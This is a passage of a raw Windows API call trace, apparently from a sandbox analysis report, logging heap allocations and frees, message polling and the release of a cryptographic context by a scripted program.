hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0113.102] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0113.102] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0113.102] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0113.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0113.102] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0113.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0113.103] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.104] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0113.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0113.104] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0113.104] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0113.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0113.105] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0113.106] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0113.106] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0113.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0113.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.108] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0113.108] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: 